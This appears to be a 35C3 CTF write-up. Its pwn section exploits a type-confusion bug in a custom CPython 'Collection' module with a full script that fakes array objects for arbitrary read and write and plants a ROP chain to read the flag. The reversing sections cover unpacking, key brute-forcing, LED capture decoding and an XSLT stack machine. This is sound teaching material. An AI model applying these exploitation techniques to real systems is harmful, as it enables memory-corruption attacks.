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Note: only listing solved challenges.



150 pwn / Collection


behold my collection

The container is built with the following important statements

FROM ubuntu:18.04

RUN apt-get -y install python3.6
COPY build/lib.linux-x86_64-3.6/ /usr/local/lib/python3.6/dist-packages/

Copy the library in the same destination path and check that it works with


Challenge runs at

Difficulty: easy

Files provided

Solution (by Mem2019)

This should be an easy challenge, but I have missed some basic Python knowledge essential to solving the chanllenge, so I failed to solve it in the contest. :(

Anyway let's start looking at it. The Python3.6 and libc given are exactly same as the ones in Ubuntu 18.04, so they are not important. According to the instruction and the files given, we can find that a new data type Collection implemented in is given. Anything that can help to get the flag directly in Python is disabled, and it is obvious that we need to exploit the given Collection data type to get the flag.

But how does the extended data type works? For example, there should be some convention that helps the CPython to know how to correspond Python function with particular native C function, just like Android native function. After some investigation and Google, I found this documentation, and I will not detail the software development part here because they are well explained in the link I provides.

reverse engineering

After understanding the basic concept above, we can start looking at the .so binary.

__int64 PyInit_Collection()
  __int64 v0; // rax
  __int64 ret; // rbx

  if ( (signed int)PyType_Ready((__int64)type_Collection) < 0 )
    return 0LL;
  v0 = PyModule_Create2((__int64)def_module, 1013LL); // create the module
  ret = v0;
  if ( !v0 )
    return ret;
  PyModule_AddObject(v0, (__int64)"Collection", (__int64)type_Collection);
  // add the type into module
  // These codes are basically same as the demo in official doc
  mprotect((void *)0x439000, 1uLL, 7);
  MEMORY[0x43968F] = _mm_load_si128((const __m128i *)&16_0xcc);
  MEMORY[0x43969F] = MEMORY[0x43968F];          // write int3 into python3.6???
  mprotect((void *)0x439000, 1uLL, 5);
  init_sandbox(); // disable most syscall, we can only read the flag by `readv` and `write`
  return ret;

Then we need to look at type_Collection to find the member functions of data type Collection. I initially decide to import the PyTypeObject from Python.h, but the dependency problem is a bit annoying. If anyone knows a good way to import the data structures from header files like this, please let me know. :)

Another way is just to look at the memory layout and guess. After some investigation, it is obvious that 0x1470 correspond to the get member function that should be essential, according to memory layout.


In addition, 0x1700 is the __init__ and 0x1550 is the __new__, because 0x1700 seems to assign some initial value to the struct while 0x1550 only create and return a object. To ensure our assumption, we can set the breakpoint and we can find that indeed 0x1550 will be called first when creating a Collection object.

The way to debug this thing is also tricky. The .so of Collection will not be loaded until import Collection is executed. However, when we run python3 interactively, the read syscall will be called after we import the module, which will cause the bad syscall due to the sandbox. To make the debug more convinient, we can patch the library and remove the sandbox first.

analyze critical functions

It is quite inconvinient that we cannot import the structrue to help analysis, so we cannot use y to let the code more readable.

_QWORD *__fastcall _new__(__int64 type_Collection, __int64 a2)
  __int64 len; // rax
  _QWORD *result; // rax
  __int64 arg_dict; // [rsp+0h] [rbp-18h]
  unsigned __int64 v5; // [rsp+8h] [rbp-10h]

  v5 = __readfsqword(0x28u);
  if ( PyArg_ParseTuple(a2, "O!", &PyDict_Type, &arg_dict) )
    len = PyDict_Size(arg_dict, (__int64)"O!");
    if ( len && len <= 32 )                     // off by one, but not very exploitable
      result = (_QWORD *)(*(__int64 (__fastcall **)(__int64, _QWORD))(type_Collection + 0x130))(type_Collection, 0LL);// type->tp_alloc(type, 0)
      if ( result )
        result[2] = 0LL;
      result = &Py_NoneStruct;
    PyErr_SetString(PyExc_TypeError, "parameter must be a dictionary");
    result = 0LL;
  return result;

PyArg_ParseTuple is an interesting function, it separates the tuple PyObject into elements specified by format, and return NULL if the format is inconsistent with the real type. The detial is in official document. The PyObject is the C representation of Python object in C. The first field is reference count, and the second field is a pointer pointing to its PyTypeObject struct that specifies its type. The following data vary with different types of object. For example, for the Python big integer type, there will be an array storing the value of the big integer. The total length of the PyObject can also vary.

Then we are going to look at __init__ and get to see the memory layout of PyObject of Collection

// the return value of __new__ is a1
unsigned int __fastcall _init__(__int64 collection_obj, __int64 a2)
  __int64 v2; // r14
  __int64 dict_; // rbx
  int i; // er12
  __int64 keys; // r13
  list *lRecord; // r15
  char *strKey; // rax
  int type; // esi
  __int64 v9; // rdx
  record *v10; // rax
  handler *v11; // rax
  unsigned int result; // eax
  __int64 v13; // rdi
  __int64 v14; // rax
  char *v15; // ST08_8
  __int64 dict; // [rsp+18h] [rbp-60h]
  __int64 poKey; // [rsp+20h] [rbp-58h]
  _QWORD *poVal; // [rsp+28h] [rbp-50h]
  __int64 ppos; // [rsp+30h] [rbp-48h]
  unsigned __int64 v20; // [rsp+38h] [rbp-40h]

  v2 = collection_obj;
  v20 = __readfsqword(0x28u);
  if ( PyArg_ParseTuple(a2, "O!", &PyDict_Type, &dict) )
    dict_ = dict;
    if ( *(_BYTE *)(*(_QWORD *)(dict + 8) + 171LL) & 0x20 )
      i = 0;
      keys = PyDict_Keys(dict);
      if ( *(_BYTE *)(*(_QWORD *)(keys + 8) + 171LL) & 2 )
        while ( i < PyList_Size(keys) )
          if ( !(*(_BYTE *)(*(_QWORD *)(PyList_GetItem(keys, i) + 8) + 171LL) & 0x10) )
            PyErr_SetString(PyExc_TypeError, "parameter must be a string");
              // check all keys are string
            goto LABEL_20;
        lRecord = listCreate();
        ppos = 0LL;
        while ( PyDict_Next(dict_, &ppos, &poKey, &poVal) )
          strKey = PyUnicode_AsUTF8(poKey);
          type = 0;
          v9 = *(_QWORD *)(poVal[1] + 168LL);
          if ( !(v9 & 0x2000000) )
            type = 2;
            if ( !(v9 & 0x20000000) )
              type = 1;
              if ( !(v9 & 0x1000000) )
                v15 = strKey;
                PyErr_SetString(PyExc_TypeError, "properties can only be either list, dictionary or an integer");
                type = -1;
                strKey = v15;
          v10 = newRecord(strKey, type);
          listAppend(lRecord, v10);
        v11 = getTypeHandler(lRecord);
        ppos = 0LL;
        *(_QWORD *)(collection_obj + 16) = v11;
        while ( 1 )
          result = PyDict_Next(dict_, &ppos, &poKey, &poVal);
          if ( !result )
          v13 = poKey;
          if ( *(_BYTE *)(poVal[1] + 171LL) & 1 )
            v14 = PyLong_AsLong(poVal);
            *(_QWORD *)(v2 + 8 * ppos + 16) = v14;
            *(_QWORD *)(v2 + 8 * ppos + 16) = poVal;// ppos start from 1
        PyErr_SetString(PyExc_TypeError, "parameter must be a list");
        PyErr_SetString(PyExc_TypeError, "parameter must be a list");
        result = -1;
      PyErr_SetString(PyExc_TypeError, "parameter must be a list");
      result = -1;
    PyErr_SetString(PyExc_TypeError, "parameter must be a dictionary");
    result = 0;
  return result;
void *__fastcall py_get(CollectionObj *a1, __int64 a2)
  __int64 *v2; // rcx
  CollectionObj *v3; // rbx
  __int64 *v4; // rdi
  int idx; // eax
  node *iter; // rdx
  int v7; // ecx
  void *result; // rax
  __int64 arg; // [rsp+0h] [rbp-18h]
  unsigned __int64 v10; // [rsp+8h] [rbp-10h]

  v3 = a1;
  v10 = __readfsqword(0x28u);
  if ( !PyArg_ParseTuple(a2, "s", &arg, v2) )
    return &Py_NoneStruct;
  v4 = (__int64 *)a1->type;
  if ( v4 != type_Collection && !(unsigned int)PyType_IsSubtype(v4, type_Collection) )
    return &Py_NoneStruct;
  idx = listIndexOf(v3->u[0].handler->lRecord, arg, (unsigned int (__fastcall *)(_QWORD, __int64))recordNameComparator);
  if ( idx == -1 )
    return &Py_NoneStruct;
  iter = v3->u[0].handler->lRecord->head;
  if ( iter && idx > 0 )
    v7 = 0;
      iter = iter->next;
    while ( iter && idx > v7 );
  result = (void *)v3->u[idx + 1].val;
  if ( iter->record->val_type == 1 )
    result = (void *)PyLong_FromLong(result);
  return result;

relavant data structures

00000000 list            struc ; (sizeof=0x14, align=0x4, copyof_14)
00000000 head            dq ?
00000008 tail            dq ?                    ; offset
00000010 len             dd ?
00000014 list            ends
00000000 ; ---------------------------------------------------------------------------
00000000 record          struc ; (sizeof=0xC, align=0x4, mappedto_15)
00000000 key_str         dq ?
00000008 val_type        dd ?
0000000C record          ends
00000000 ; ---------------------------------------------------------------------------
00000000 handler         struc ; (sizeof=0xC, align=0x4, mappedto_17)
00000000 lRecord         dq ?
00000008 count           dd ?
0000000C handler         ends
00000000 ; ---------------------------------------------------------------------------
00000000 node            struc ; (sizeof=0x10, align=0x8, copyof_16)
00000000 record          dq ?
00000008 next            dq ?
00000010 node            ends
00000000 ; ---------------------------------------------------------------------------
00000000 union_7         union ; (sizeof=0x8, mappedto_19)
00000000 handler         dq ?                    ; offset
00000000 val             dq ?
00000000 obj             dq ?
00000000 union_7         ends
00000000 ; ---------------------------------------------------------------------------
00000000 CollectionObj   struc ; (sizeof=0x118, mappedto_20)
00000000 ref_count       dq ?
00000008 type            dq ?
00000010 u               union_7 33 dup(?)
00000118 CollectionObj   ends

record stores the key which is a string, and the type of value correspond to that key; and the handler stores a list of records, which is the type information of a specific dictionary. In the CollectionObj, which is the PyObject of Collection, we have a pointer to the handler, and we also have the array that stores the PyObject of values in dictionary, except for the integer type we just store it as long type in C. The order in handler linked list and the order in array in CollectionObj should have been matched exactly to each other. However, when getTypeHandler is called, it will return a previous handler if the handler already exists, even if the order of entries in the dictionary is different.

Here is where the vulnerability comes, type confusion. The PoC that cause the crash is simple:

ia = Collection.Collection({"int": 0x1337, "arr": [0xdead, 0xbeef]})
ai = Collection.Collection({"arr": [0xdead, 0xbeef], "int": 0x1337}) 
#they will share the same handler, even if the order is different
#and the order of the array in `CollectionObj` is also different
print(ai.get("int")) #print address
print(ai.get("arr")) #cause crash because it regards 0x1337 as address


Because I can leak the object address using id(obj), so we can fake a object easily in the memory and return an address pointing to it in the Collection.get. If we can find a structure that internally keep a pointer pointing to a C array, and we can read and write its element, we will have arbitrary address read and write. This is where I failed. The Python string is not the case because it stores the data directly in the PyObject, and we cannot edit it. The Python list is neither the case because the pointer points to an array of pointers pointing to Python objects. When we assign new value to the list, what is changed is the pointer to the Python object, instead of the content inside the object, so we cannot exploit this. Then I come to some other approach such as Python heap exploitation, but they don't work very well, or the difficulty to exploit in that way is far beyond my capability. After the CTF, I read some of the write-ups and found array.array that performs exactly same as what I expected.

Then the thing become very easy. We can leak the libc and stack address very easily, and write to stack to perform ROP that gets the flag.

import os
flag = open("flag", "r")
os.dup2(flag.fileno(), 1023)

from sys import modules
del modules['os']
import Collection
keys = list(__builtins__.__dict__.keys())
for k in keys:
	if k != 'id' and k != 'hex' and k != 'print' and k != 'range':
		del __builtins__.__dict__[k]

# ----------------start---------------------

p64 = lambda x: x.to_bytes(8,"little")

def create_rop(iov, buf):
    #ROP is easy, I won't detail this
	POPRAX = p64(0x0000000000420f7b)
	POPRDI = p64(0x0000000000421612)
	POPRSI = p64(0x000000000042110e)
	POPRDX = p64(0x00000000004026c1)
	READV = p64(0x4208B0)
	WRITE = p64(0x4207E0)
	rop = b''
	rop += POPRDI
	rop += p64(1023)
	rop += POPRSI
	rop += p64(iov)
	rop += POPRDX
	rop += p64(1)
	rop += READV #readv(1023, iov, 1)
	rop += POPRDI
	rop += p64(1)
	rop += POPRSI
	rop += p64(buf)
	rop += POPRDX
	rop += p64(0x100)
	rop += WRITE #write(1, buf, 0x100)
	rop += p64(0x2019)
	return rop

def fake_array(addr):
    # the first field is reference count, we make it big to avoid GC to collect it
    # the 0x9d3340 and 0x715508 represent the type of PyObject and type of C array respectively
    # in this case, I have chosen the unsigned char array to make it easy
    # they are obtained from debugging
    # the 3rd and 5th fields are both length, 
    # I don't know why there are 2 fields storing the same thing,
    # although they can be inequal sometimes,
    # so I just copied everything from the memory
	return p64(0x0000000000002019) + p64(0x00000000009d3340) \
		+ p64(0x0000000000002019) + p64(addr) \
		+ p64(0x0000000000002019) + p64(0x0000000000715508) \
		+ p64(0x0000000000000000) + p64(0x0000000000000000)

ia = Collection.Collection({"int":0x5cee56c130df7336, "arr":[0x2019, 0xbeef]})

ENVIRON = 0xa4f980
leak = fake_array(ENVIRON)
#suprisingly the environ is in Python module instead of libc module 
leak_addr = id(leak) + 0x20
#for the string, the data is +0x20 after the PyObject address
#but in the interactive mode, it seems to be +0x48?


ai_leak2 = Collection.Collection({"arr":[0x2019, 0xbeef], "int":leak_addr})
leak_arr2 = ai_leak2.get("arr") 
#This triggers the vulnerability, and returns an faked array.array object
#also, make sure don't reassign this variable, otherwise the GC might be triggered

assert id(leak_arr2) == leak_addr

stack_addr = 0
for i in range(0,8):
	stack_addr |= (leak_arr2[i]) << (8 * i)
#leak the stack address

#here we decide to write the ROP into the return address of Py_Main
#which should return to function main, and will be executed when the Python script terminates
#This is good because it will not interfere essential data at the top of the stack,
#and we are sure it will be executed as long as the program terminates
stack_addr -= 0x148 # will point to return address of Py_Main

#-------------------leak address to shoot rop

write = fake_array(stack_addr)
write_addr = id(write) + 0x20
buf_addr = 0xA4FF00 # choose a buffer that will not be used
fake_iov = p64(buf_addr) + p64(0x100)
iov_addr = id(fake_iov) + 0x20
#fake the iov for readv

ai_write = Collection.Collection({"arr":[0x2019, 0xbeef], "int":write_addr})
write_arr = ai_write.get("arr")
#basically same as above

rop = create_rop(iov_addr, buf_addr)

for i in range(15 * 8):
	write_arr[i] = rop[i]
#-----------------------write ROP

49 rev / 0pack


Build with my new packer framework. Do you likes zeros in weird places? Try this!

(Password does not contain 35C3_, prepend before submitting flag 35C3_${extracted_password}) Guest challenge by Qubasa.

Difficulty estimate: medium

Files provided

Solution (by Mem2019)

To solve this challenge, we need to unpack the binary first. After some inspection, we can dump the binary using gdb dump binary memory code.bin 0x555555554628 0x555555567094, because this is the region where the writable codes lie.

Then put it into the executable.

p = open("code.bin", "r")
d =

f = open("0pack.elf", "r+")

Using backtrace command in gdb, we can find the function that calls the function to get input, here it is fgets

__int64 __usercall sub_5555555669A0@<rax>(__int64 a1@<rsi>, _BYTE *a2@<r15>)
  char need1; // [rsp+1Dh] [rbp-83h]
  char s[15]; // [rsp+20h] [rbp-80h]
  char v5[16]; // [rsp+30h] [rbp-70h]
  char out[58]; // [rsp+50h] [rbp-50h]
  unsigned __int64 v7; // [rsp+98h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  need1 = 1;
  strcpy(v5, "Input password: ");
  printf("%s", v5, a1);
  fgets(s, 15, stdin);
  if ( s[0] != a2[74869] || antidbg() ) //clear plain text comparison
    need1 = 0;
  if ( s[1] != a2[74968] || antidbg() )
    need1 = 0;
  if ( s[2] != a2[74298] || antidbg() )
    need1 = 0;
  if ( s[3] != a2[74319] || antidbg() )
    need1 = 0;
  if ( s[4] != a2[74868] || antidbg() )
    need1 = 0;
  if ( s[5] != a2[74319] || antidbg() )
    need1 = 0;
  if ( s[6] != a2[74664] || antidbg() )
    need1 = 0;
  if ( s[7] != a2[74869] || antidbg() )
    need1 = 0;
  if ( s[8] != a2[74874] || antidbg() )
    need1 = 0;
  if ( s[9] != a2[74298] || antidbg() )
    need1 = 0;
  if ( s[10] != a2[74309] || antidbg() )
    need1 = 0;
  if ( s[11] != a2[74954] || antidbg() )
    need1 = 0;
  if ( s[12] != a2[74792] || antidbg() )
    need1 = 0;
  if ( s[13] != a2[74968] || antidbg() )
    need1 = 0;
  if ( need1 )
    *(_QWORD *)out = '��_��� (';
    *(_QWORD *)&out[8] = '��� (\n)�';
    *(_QWORD *)&out[16] = '��>)���_';
    *(_QWORD *)&out[24] = '���-����';
    *(_QWORD *)&out[32] = '��␌�(\n';
    *(_QWORD *)&out[40] = 'uf )���_';
    *(_QWORD *)&out[48] = '!haey kc';
    *(_WORD *)&out[56] = '\n';
    *(_QWORD *)out = '�� wwwwA';
    *(_DWORD *)&out[8] = '��_�';
    *(_WORD *)&out[12] = '\n�';
    out[14] = 0;
  printf("%s", out);
  return 0LL;

By debugging, we can find that a2 == 0x555555554000, so get the flag using IDA script

s = [None] * 14
s[0] = chr(Byte(0x555555554000 + 74869))
s[1] = chr(Byte(0x555555554000 + 74968))
s[2] = chr(Byte(0x555555554000 + 74298))
s[3] = chr(Byte(0x555555554000 + 74319))
s[4] = chr(Byte(0x555555554000 + 74868))
s[5] = chr(Byte(0x555555554000 + 74319))
s[6] = chr(Byte(0x555555554000 + 74664))
s[7] = chr(Byte(0x555555554000 + 74869))
s[8] = chr(Byte(0x555555554000 + 74874))
s[9] = chr(Byte(0x555555554000 + 74298))
s[10] = chr(Byte(0x555555554000 + 74309))
s[11] = chr(Byte(0x555555554000 + 74954))
s[12] = chr(Byte(0x555555554000 + 74792))
s[13] = chr(Byte(0x555555554000 + 74968))

print ''.join(s)

But one thing that I don't understand is the way the packer works. The entry point is 0 for this executable, and so the initial rip should be 0x555555554000 with ASLR disabled. However, the data there in IDA pro and gdb are 0xe9 0xfb 0x5f 0x41 0x00, which is jmp 0x55555596a000. The instructions in 0x55555596a000 make sense, because they seem to be the entry point of a packer. However, I don't know where 0xe9 0xfb 0x5f 0x41 0x00 comes from, because that address should be magic number of ELF header, "\x7fELF", and indeed in the ELF file it is so. And I cannot find 0xe9 0xfb 0x5f 0x41 0x00 in binary ELF file. Well, so I am not sure how these bytes are changed.

72 rev / box of blink


As every year, can you please decode this for me?

Files provided


The image shows a prototyping setup with:

  • a LED board (bottom right)
  • an oscilloscope (top) showing some squarewaves / digital data capture
  • a logic analyser (centre)
  • a Raspberry Pi (bottom left)

It is clear that the Pi has a program running that presumably displays the flag on the LED board at some point, and that the logic analyser captured this operation as the file we were given. The oscilloscope might give some additional hints for what to look for in the data but it is not terribly important to solving the challenge.

Unpacking the blink.csv.gz file, we can see that it is a quite large (410 MiB) Comma-Separated Values file, i.e. a text-based table format. In the first 21 lines we see some metadata emitted by the logic analyser, but more importantly, we see the labels for all the 10000000 data entries that follow.

$ wc -l blink.csv
$ head -n 22 blink.csv
#Firmware Version,1.26
#Waveform Type,DIGITAL,,,,,,,,,,,,,
#Point Format,Y,,,,,,,,,,,,,
#Horizontal Units,s,,,,,,,,,,,,,
#Horizontal Scale,0.004,,,,,,,,,,,,,
#Sample Interval,4e-09,,,,,,,,,,,,,
#Record Length,1e+07,,,,,,,,,,,,,
#Gating,0.0% to 100.0%,,,,,,,,,,,,,
#Vertical Units,V,V,V,V,V,V,V,V,V,V,V,V,V,V
#Threshold Used,1.65,1.65,1.65,1.65,1.65,1.65,1.65,1.65,1.65,1.65,1.65,1.65,1.65,1.65

TIME is the only column with decimal data, but it is irrelevant to us (it is enough to know that successive lines represent samples taken at successive times), so we will ignore it. The remaining columns are all digital, only taking values 0 or 1. Some of their labels are clear enough, some not so much:

  • OE - ?
  • LAT - latch?
  • CLK - clock
  • E ... A - ? 5 bits = 64 possible values
  • {R,G,B}{1,2} - 2 bits for each colour channel - Red, Green, Blue

CLK is a very important signal to see in captures like this. It is not trivial to perfectly synchronise two devices, so it is common to use a dedicated clock signal emitted by one device (master) that tells the other (slave) when to read data from the remaining signals. In our case we only need to read data entries when the clock "goes high", i.e. its value is 0 on the previous sample and 1 on the current sample.

At this point we can try to test various theories about how the data is actually transmitted using the remaining signals (LAT, E ... A, and {R,G,B}{1,2}). However, for a speedy flag it was worth trying the simplest possible method – what if the Pi transmits displays the flag right away, i.e. there is no metadata exchanged, just pixels?

It would be useful to know what shape the data would be in. The photo is in good enough resolution (and was actually much higher res during the CTF) for us to be able to count the individual LEDs on the LED board. It consists of two 64x64 squares, 128x64 pixel resolution in total.

Then we can assume that R1 is the most significant bit of the red channel, R2 is the LSB (not that it really matters), and print out pixels!

Full pixel reader script

The output is by no means perfect, but it got us the flag with minimal effort!


65 rev / corebot


Difficulty estimate: easy

Guest challenge by Jesko / rattle.

UPDATE: Challenge binary replaced. Apologies for the inconvenience.

Files provided

Solution (by Mem2019)

The core function is easy, decrypt specific data using the key generated from VolumeSerialNumber, and compare the first 4 bytes of decryption result with 35C3. In other word, we need to find the correct serial number that can decrypt the data to the flag.

The best way is to use the brute force crack.

#include <windows.h>
#include <stdio.h>
struct key
	DWORD head[3];
	WORD serials[0x10];

bool crack(DWORD serialNumber)
	DWORD len = 0x20;
	BYTE res[] = "\x10\x29\xB8\x45\x9D\x2A\xAB\x93\xFE\x89\xFB\x82\x93\x42\xA1\x8C\x2E\x90\x63\x00\x06\x11\x80\x64\xB8\x21\xC2\x9F\x35\xE7\x7E\xF2";
	HCRYPTPROV cryptContext;
	CryptAcquireContextA(&cryptContext, 0, 0, 0x18u, 0);
    //initialization that gets the context
	int i = 16;
		data.serials[i] = (WORD)serialNumber;
		serialNumber ^= ((DWORD)(WORD)serialNumber >> 4) ^ 
			((WORD)serialNumber << 11) ^ ((WORD)serialNumber << 7);
        //actually only low 16 bits of serial are used here, so we only need to crack 0x10000 times
	}// do some transformation
	while (i);
	CryptImportKey(cryptContext, (const BYTE *)&data, 0x2Cu, 0, 0, (HCRYPTKEY *)&key);
    //import the key from raw bytes to some struct
	CryptSetKeyParam(key, KP_MODE, (const BYTE *)&cmode, 0);
    //set mode to ECB
	CryptDecrypt(key, 0, 1, 0, (BYTE *)&res, (DWORD *)&len);
	return (memcmp(res, "35C3", 4) == 0);

void init()
	data.head[0] = 0x208;
	data.head[1] = 0x6610;
	data.head[2] = 0x20;

int main()
	for (size_t i = 0; i < 0xffffffff; i++)
		if (i % 0x1000 == 0)
			printf("%x\n", i);
		if (crack(i))
			printf("%x\n", i);
	return 0;

A tricky point is that this program is written by assembly directly, because almost no compiler will generate assembly code like this. Especially, when doing the transformation, the hex-ray will give the wrong pseudo code.

For example,

//in the loop
HIWORD(v18) = serialNumber;                 // wrong!

This is actually many continuous push that create an array finally, instead of assigning to the same variable for 16 times

push    ax              ; push 16 * 2 = 0x20 bytes

along with the extra 0xC bytes being pushed after the loop, we have 0x2C bytes, which matches the dwDataLen argument of CryptImportKey exactly.

push    20h
push    6610h
push    small 0
push    small 208h      ; 0xc bytes

97 rev / juggle


Can you help this restaurant Stack the right amount of Eggs in their ML algorithms?

Guest challenge by Tethys.

Note that you need to send a shutdown(2) after you sent your solution. The nmap netcat will do so for you, e.g.: ncat 1 < solution.xml

/usr/bin/ncat --help | grep -n 1 Ncat 7.60 ( )

Files here:

Files provided


At first I wanted to completely skip this challenge because I thought "ML" in the description referred to Machine Learning, not an uncommon theme in difficult CTF challenges. But I'm really glad I got back to it eventually!

In the archive we are given two files:

The first step is to tidy up the challenge file with some auto format.

Auto-formatted challenge.xslt

At this point we can start dissecting the file more comfortably, one bit at a time. The root element, <xsl:stylesheet> specifies some XLST "libraries", math and common. It has two child nodes. The first is a template that matches on /meal elements. Based on the description we will have to send the challenge server an XML file, so it seems the root element of our file will be <meal>. The other is a template with a name, but no element match, so it will be invoked indirectly by the XSLT itself.

Let us have a closer look at the first template, matching on /meal. First, there is an assertion:

<xsl:if test="count(//plate) &gt; 300">
  <xsl:message terminate="yes">You do not have enough money to buy that much food</xsl:message>

If we have more than 300 <plate> elements in our submission, the above message is printed and the process is stopped (terminate="yes"). Note also the fact that plates are counted with //plate, i.e. nested two levels deep (including <meal>).

Next, a variable called chef-drinks is defined:

<xsl:variable name="chef-drinks">
  <value><xsl:value-of select="round(math:random() * 4294967296)"/></value>
  <value><xsl:value-of select="round(math:random() * 4294967296)"/></value>
  <value><xsl:value-of select="round(math:random() * 4294967296)"/></value>
  <value><xsl:value-of select="round(math:random() * 4294967296)"/></value>
  <value><xsl:value-of select="round(math:random() * 4294967296)"/></value>

It seems to be an array of five randomly generated 32-bit unsigned integers (4294967296 = 0x100000000 = 2^32).

Finally, the other template is "called", like a function:

<xsl:call-template name="consume-meal">
  <xsl:with-param name="chef-drinks" select="exsl:node-set($chef-drinks)//value"/>
  <xsl:with-param name="food-eaten" select="1"/>
  <xsl:with-param name="course" select="course[position() = 1]/plate"/>
  <xsl:with-param name="drinks" select="state/drinks"/>

The chef-drinks variables is given as-is. food-eaten is initialised at 1. course is set to all <plate> elements in the first <course> element of our <meal> submission. And finally, drinks is initialised to the <drinks> element in <state>.

Before looking into what consume-meal does, we already know / can guess our submission will have this shape:


Now we can move onto consume-meal. Its first lines declare the parameters we already know about – chef-drinks, food-eaten, course, and drinks. Then there are two assertions:

<xsl:if test="$food-eaten &gt; 30000">
  <xsl:message terminate="yes">You ate too much and died</xsl:message>
<xsl:if test="count($drinks) &gt; 200">
  <xsl:message terminate="yes">You cannot drink that much</xsl:message>

Both of these seem to be fatal errors. Since food-eaten was initialised at 1, the first assertion would only make sense if consume-meal was called multiple times. And indeed, if we scroll a bit further, we will find that consume-meal is called again from within itself, i.e. it is recursive. At each step, it increases food-eaten by one. In other words, food-eaten is a step counter that cannot go above 30000.

By similar logic, drinks must be modified within consume-meal, otherwise this assertion could have been made before the initial call. Whatever drinks are, we cannot have more than 200 of them.

Finally, we move on to the core of the XSLT. If we have any elements in $course, we initialise a couple of variables:

<xsl:if test="count($course) &gt; 0">
  <xsl:variable name="c" select="$course[1]"/>
  <xsl:variable name="r" select="$course[position()&gt;1]"/>

c will refer to the first element of $course (since in XML land lists are 1-indexed), and r will refer to the remaining elements. Note at this point that $course does NOT refer to our <course> elements. Recall that consume-meal was invoked with <xsl:with-param name="course" select="course[position() = 1]/plate"/>, so $course will contain the <plate> elements of our first <course> (on the first iteration).

So with an input like:


During the first call to consume-meal, $c will be <plate><foo/></plate>, and $r will be the list of <plate><bar/></plate> and <plate><baz/></plate>.

After $c and $r are initialised, there is a large <xsl:choose> block, equivalent to a switch statement in conventional programming languages. The <xsl:choose> element checks to see what is "in" our plates, i.e. what elements are contained in our <plate> element. Let us have a look at one of these choices:

<xsl:when test="count($c/paella) = 1">
  <xsl:variable name="newdrinks">
      <xsl:value-of select="$c/paella + 0"/>
    <xsl:copy-of select="$drinks"/>
  <xsl:call-template name="consume-meal">
    <xsl:with-param name="chef-drinks" select="$chef-drinks"/>
    <xsl:with-param name="food-eaten" select="$food-eaten + 1"/>
    <xsl:with-param name="course" select="$r"/>
    <xsl:with-param name="drinks" select="exsl:node-set($newdrinks)//value"/>

In other words, if our <plate> contained a <paella> element, we will invoke consume-meal again with slightly modified parameters:

  • chef-drinks - chef-drinks (the 5 random numbers) remain the same
  • food-eaten - increased by one
  • course - $r, i.e. the remaining plates of this <course>
  • drinks - $newdrinks, created just above, consisting of some value (contained within our <paella> element) prepended to the original $drinks

By this point it should be pretty clear that this XSLT is in fact a virtual machine! Each <plate> will contain an instruction which will modify the state and pass that state onto the next invocation of consume-meal. The <course> elements are blocks of instructions, in essence behaving like labels. drinks are in fact our stack. With a <paella> instruction we can push an immediate value to our stack. We can analyse all the instructions one by one:

  • 宫保鸡丁 - debug command, prints chef-drinks as well as drinks
  • paella - push immediate value to stack
  • 불고기 - duplicate a given element of the stack and push it
  • Борщ - pop top element of chef-drinks if it matches top of drinks
  • दाल - print the flag if no chef-drinks remain
  • ラーメン - push 1 if top of drinks is greater than top of chef-drinks, 0 otherwise
  • stroopwafels - push 1 if 2nd value in drinks is greater than top value in drinks
  • köttbullar - move a given element from drinks to the top
  • γύρος - remove a given element from drinks
  • rösti - add top elements of drinks
  • לאַטקעס - subtract top elements of drinks
  • poutine - multiply top elements of drinks
  • حُمُّص - integer divide top elements of drinks
  • æblegrød - jump to a given <course> if top of drinks is not 0

A limited instruction set, but Turing-complete nonetheless. Of particular note is दाल - prints the flag if (and only if) there are no more chef-drinks. In fact the 5 random numbers generated at the beginning form an additional stack, one that we cannot directly manipulate. The debug command 宫保鸡丁 prints out the values of chef-drinks (as well as our drinks), but this is indeed only useful for debugging – each time we run our XML on the server, the numbers are different, and we have no way to send what we saw from the debug command back to the XML file we submitted.

So our XML needs to run instructions that will guess the chef-drinks (using Борщ) one by one, without seeing their values. The only other instruction dealing with chef-drinks is ラーメン, which compares the top of our stack drinks with the top of the challenge stack chef-drinks.

In other words, we need to implement a binary search. We can adapt the pseudo-code for binary search from Rosetta code:

BinarySearch(A[0..N-1], value) {
    low = 0
    high = N - 1
    while (low <= high) {
        // invariants: value > A[i] for all i < low
                       value < A[i] for all i > high
        mid = (low + high) / 2
        if (A[mid] > value)
            high = mid - 1
        else if (A[mid] < value)
            low = mid + 1
            return mid
    return not_found // value would be inserted at index "low"

Since we only have >, the code we will implement is:

high = 0x100000000;
low = 0;
while (high > low) {
  var mid = (low + high) >> 1; // integer divide by two
  if (mid + 1 > number) {
    high = mid;
  } else {
    low = mid + 1;

During the CTF, I chose to implement a simple assembler. I was particularly worried about Unicode messing up my instructions (RTL marks, non-canonical ordering, bad copypaste), but of course labels and a minimum of type safety was a plus. Debugging wasn't particularly easy with the remote server, so at some point I also implemented an emulator to test my code.

Full assembler/emulator script here

$ haxe -D EMULATE --run Juggle
ins(0): PUSHI(0); stack: 0
ins(1): PUSHI(8388608); stack: 8388608,0
ins(2): PUSHI(1); stack: 1,8388608,0
ins(3): PUSHI(1); stack: 1,1,8388608,0
ins(4): JMP; stack: 8388608,0
ins(0): PUSHI(2); stack: 2,8388608,0
ins(1): PUSHI(1); stack: 1,2,8388608,0
ins(2): DUPN; stack: 8388608,2,8388608,0
ins(3): PUSHI(3); stack: 3,8388608,2,8388608,0
ins(4): DUPN; stack: 0,8388608,2,8388608,0
... etc etc
ins(0): PUSHI(0); stack: 0,6830991,6830991
ins(1): DROP; stack: 6830991
ins(2): CHECK; checking 6830991 against 6830991 ... OK!
ins(3): END; flag!

The submission generated is available here. After running it on the server, we get the flag:


215 rev / notifico


veni, vidi, notifici

Notes: - only chmod, no touch - no root user, please - tar --no-same-owner -xhzf chall.tar.gz

Challenge files

HINT: The graph is a move graph for a certain type of chess piece.

Files provided


In the tar archive, we see three files:

  • chall.tar - another archive containing 225 directories with some 40-50 files each, although all but one in each directory are symlinks
  • - flag decryption script invoking check in the process
  • check - ELF executable to verify a given directory

The first step was to look into The important bit was:

VAL = 15

# ...

res =["./check", basedir])

if res == 255 or res != VAL:
    print("This looks no good...")
    print("A worthy try, let's see if it yields something readable...")

So whatever directory we give it as our "solution", it will invoke the check executable on it. check in turn must return VAL, i.e. 15 for the solution to be considered valid. The SHA-256 hash of the UNIX permissions of the files in our solution directory is then used to decrypt a flag encrypted using AES. Given that there are 225 "regular" files and hundreds of symlinks in the chall.tar archive which forms the template for our solution, brute-force is infeasible.

